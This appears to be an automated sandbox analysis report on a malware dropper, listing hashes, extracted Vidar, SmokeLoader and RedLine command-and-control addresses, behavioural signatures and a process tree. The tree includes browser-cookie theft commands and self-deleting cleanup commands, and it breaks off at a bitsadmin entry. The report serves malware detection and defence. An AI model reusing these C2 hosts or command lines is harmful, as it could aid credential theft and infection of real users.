Overview

overview

10

Static

static

8 (1).exe

windows7_x64

10

8 (1).exe

windows10_x64

10

8 (10).exe

windows7_x64

10

8 (10).exe

windows10_x64

10

8 (11).exe

windows7_x64

8

8 (11).exe

windows10_x64

10

8 (12).exe

windows7_x64

10

8 (12).exe

windows10_x64

10

8 (13).exe

windows7_x64

10

8 (13).exe

windows10_x64

10

8 (14).exe

windows7_x64

10

8 (14).exe

windows10_x64

10

8 (15).exe

windows7_x64

10

8 (15).exe

windows10_x64

10

8 (16).exe

windows7_x64

10

8 (16).exe

windows10_x64

10

8 (17).exe

windows7_x64

10

8 (17).exe

windows10_x64

10

8 (18).exe

windows7_x64

10

8 (18).exe

windows10_x64

10

8 (19).exe

windows7_x64

10

8 (19).exe

windows10_x64

10

8 (2).exe

windows7_x64

10

8 (2).exe

windows10_x64

10

8 (20).exe

windows7_x64

10

8 (20).exe

windows10_x64

10

8 (21).exe

windows7_x64

10

8 (21).exe

windows10_x64

10

8 (22).exe

windows7_x64

10

8 (22).exe

windows10_x64

10

8 (23).exe

windows7_x64

10

8 (23).exe

windows10_x64

10

Resubmissions

13/08/2021, 10:16

210813-wpta271jdx 10

08/08/2021, 23:00

210808-fgs5g9pxfs 10

07/08/2021, 23:12

210807-g2jw1lmd4a 10

07/08/2021, 16:10

210807-51nhct4kfx 10

06/08/2021, 23:43

210806-gc2271nxwj 10

06/08/2021, 06:00

210806-f443x39x8a 10

05/08/2021, 17:08

210805-97y6banvvx 10

04/08/2021, 17:25

210804-hkxx2ntr8x 10

04/08/2021, 12:12

210804-rjbg4b4y7n 10

03/08/2021, 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1802s
  • max time network
    1814s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    06/08/2021, 06:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8 (12).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Score
10/10
raccoonredlinesmokeloadersocelarsvidar933focus1wwaspackv2backdoordiscoveryevasioninfostealerpersistencespywarestealersuricatatrojanupxvmprotect

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/
rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

Focus1

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

WW

C2

193.56.146.60:51431

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 4 IoCs
  • Registers COM server for autorun 1 TTPs
    persistence
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 4 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • UAC bypass 3 TTPs
    evasiontrojan
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • suricata: ET MALWARE GCleaner Downloader Activity M1

    suricata: ET MALWARE GCleaner Downloader Activity M1

    suricata
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata
  • suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

    suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

    suricata
  • suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

    suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

    suricata
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Nirsoft 1 IoCs
  • Vidar Stealer 2 IoCs
    stealer
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
    evasiontrojan
  • Drops desktop.ini file(s) 2 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 34 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • Checks SCSI registry key(s) 3 TTPs 21 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
    evasion
  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Kills process with taskkill 7 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 9 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
    evasion

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2684
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2892
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2676
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2484
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2460
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1912
              • C:\Users\Admin\AppData\Local\Temp\8 (12).exe
                "C:\Users\Admin\AppData\Local\Temp\8 (12).exe"
                1⤵
                • Suspicious use of WriteProcessMemory
                PID:996
                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2520
                  • C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\setup_install.exe
                    "C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\setup_install.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:1492
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c sonia_1.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3420
                      • C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\sonia_1.exe
                        sonia_1.exe
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:3924
                        • C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\sonia_1.exe
                          "C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\sonia_1.exe" -a
                          6⤵
                          • Executes dropped EXE
                          PID:3248
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c sonia_2.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4056
                      • C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\sonia_2.exe
                        sonia_2.exe
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: MapViewOfSection
                        PID:3952
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c sonia_5.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2140
                      • C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\sonia_5.exe
                        sonia_5.exe
                        5⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        PID:1652
                        • C:\Users\Admin\Documents\73N2f3dsqZtT_GryIgwJzBYi.exe
                          "C:\Users\Admin\Documents\73N2f3dsqZtT_GryIgwJzBYi.exe"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:4252
                          • C:\Users\Admin\Documents\73N2f3dsqZtT_GryIgwJzBYi.exe
                            "C:\Users\Admin\Documents\73N2f3dsqZtT_GryIgwJzBYi.exe"
                            7⤵
                              PID:4956
                          • C:\Users\Admin\Documents\KElpfrzwUGLUdc_9rwohEOlO.exe
                            "C:\Users\Admin\Documents\KElpfrzwUGLUdc_9rwohEOlO.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4048
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c taskkill /f /im chrome.exe
                              7⤵
                                PID:4304
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /f /im chrome.exe
                                  8⤵
                                  • Kills process with taskkill
                                  PID:4180
                            • C:\Users\Admin\Documents\F5KxfcnjllEXYHxs018b2Rwy.exe
                              "C:\Users\Admin\Documents\F5KxfcnjllEXYHxs018b2Rwy.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:2920
                            • C:\Users\Admin\Documents\zZCNMCvyd604ZSbu0Gww4ZQp.exe
                              "C:\Users\Admin\Documents\zZCNMCvyd604ZSbu0Gww4ZQp.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:4400
                              • C:\Users\Admin\Documents\zZCNMCvyd604ZSbu0Gww4ZQp.exe
                                "{path}"
                                7⤵
                                  PID:4340
                                • C:\Users\Admin\Documents\zZCNMCvyd604ZSbu0Gww4ZQp.exe
                                  "{path}"
                                  7⤵
                                    PID:4048
                                • C:\Users\Admin\Documents\dhu7EuXl9V9UCb1xTP4C8z2_.exe
                                  "C:\Users\Admin\Documents\dhu7EuXl9V9UCb1xTP4C8z2_.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Modifies registry class
                                  PID:1228
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    7⤵
                                    • Executes dropped EXE
                                    PID:584
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    7⤵
                                    • Executes dropped EXE
                                    PID:5248
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    7⤵
                                      PID:5932
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      7⤵
                                        PID:2176
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        7⤵
                                          PID:6124
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          7⤵
                                            PID:5040
                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                              PID:6868
                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                                PID:6276
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                  PID:6348
                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                    PID:5228
                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                      PID:5180
                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      7⤵
                                                        PID:2856
                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                          PID:4512
                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                            PID:6968
                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            7⤵
                                                              PID:5992
                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              7⤵
                                                                PID:5460
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                7⤵
                                                                  PID:5512
                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                    PID:5984
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                      PID:6964
                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      7⤵
                                                                        PID:3716
                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        7⤵
                                                                          PID:772
                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          7⤵
                                                                            PID:6536
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            7⤵
                                                                              PID:2124
                                                                          • C:\Users\Admin\Documents\uXr09RWmY6SRMbrDSFfaZ_0f.exe
                                                                            "C:\Users\Admin\Documents\uXr09RWmY6SRMbrDSFfaZ_0f.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:392
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 480
                                                                              7⤵
                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                              • Program crash
                                                                              PID:4232
                                                                          • C:\Users\Admin\Documents\hsCdANIUKB4wzcSDG7GdlU2e.exe
                                                                            "C:\Users\Admin\Documents\hsCdANIUKB4wzcSDG7GdlU2e.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:2400
                                                                          • C:\Users\Admin\Documents\m_fBIbDOJjJ40H7N08r37W_j.exe
                                                                            "C:\Users\Admin\Documents\m_fBIbDOJjJ40H7N08r37W_j.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:3244
                                                                            • C:\Users\Admin\Documents\m_fBIbDOJjJ40H7N08r37W_j.exe
                                                                              C:\Users\Admin\Documents\m_fBIbDOJjJ40H7N08r37W_j.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4860
                                                                          • C:\Users\Admin\Documents\eeKqGdOincy_ixPYMRHkQJWN.exe
                                                                            "C:\Users\Admin\Documents\eeKqGdOincy_ixPYMRHkQJWN.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:4536
                                                                          • C:\Users\Admin\Documents\lJP2dxEPmNCJIDNdHyFHwpJu.exe
                                                                            "C:\Users\Admin\Documents\lJP2dxEPmNCJIDNdHyFHwpJu.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:4972
                                                                          • C:\Users\Admin\Documents\C2dq7a8ZKe65UPgzVtenVMuG.exe
                                                                            "C:\Users\Admin\Documents\C2dq7a8ZKe65UPgzVtenVMuG.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:4864
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 656
                                                                              7⤵
                                                                              • Program crash
                                                                              PID:908
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 668
                                                                              7⤵
                                                                              • Program crash
                                                                              PID:4916
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 672
                                                                              7⤵
                                                                              • Program crash
                                                                              PID:4240
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 688
                                                                              7⤵
                                                                              • Program crash
                                                                              PID:4960
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 1120
                                                                              7⤵
                                                                              • Program crash
                                                                              PID:4100
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 1148
                                                                              7⤵
                                                                              • Program crash
                                                                              PID:4292
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 1160
                                                                              7⤵
                                                                              • Program crash
                                                                              PID:2608
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "C2dq7a8ZKe65UPgzVtenVMuG.exe" /f & erase "C:\Users\Admin\Documents\C2dq7a8ZKe65UPgzVtenVMuG.exe" & exit
                                                                              7⤵
                                                                                PID:4652
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /im "C2dq7a8ZKe65UPgzVtenVMuG.exe" /f
                                                                                  8⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:4916
                                                                            • C:\Users\Admin\Documents\i5bS_Ih72f4r9YsRDRsMHIek.exe
                                                                              "C:\Users\Admin\Documents\i5bS_Ih72f4r9YsRDRsMHIek.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks processor information in registry
                                                                              PID:5088
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im i5bS_Ih72f4r9YsRDRsMHIek.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\i5bS_Ih72f4r9YsRDRsMHIek.exe" & del C:\ProgramData\*.dll & exit
                                                                                7⤵
                                                                                  PID:6084
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /im i5bS_Ih72f4r9YsRDRsMHIek.exe /f
                                                                                    8⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:5244
                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                    timeout /t 6
                                                                                    8⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:4960
                                                                              • C:\Users\Admin\Documents\uHm09NMJM6F4Q046FphKs_dN.exe
                                                                                "C:\Users\Admin\Documents\uHm09NMJM6F4Q046FphKs_dN.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:1648
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 664
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:4492
                                                                              • C:\Users\Admin\Documents\hJnmKJvqSgAJfTJT6M9Cw6Ri.exe
                                                                                "C:\Users\Admin\Documents\hJnmKJvqSgAJfTJT6M9Cw6Ri.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Drops file in Program Files directory
                                                                                PID:5032
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks SCSI registry key(s)
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:4956
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:2700
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:5592
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:5892
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                          PID:3628
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"
                                                                                          7⤵
                                                                                            PID:3100
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"
                                                                                            7⤵
                                                                                            • Checks for any installed AV software in registry
                                                                                            PID:3968
                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
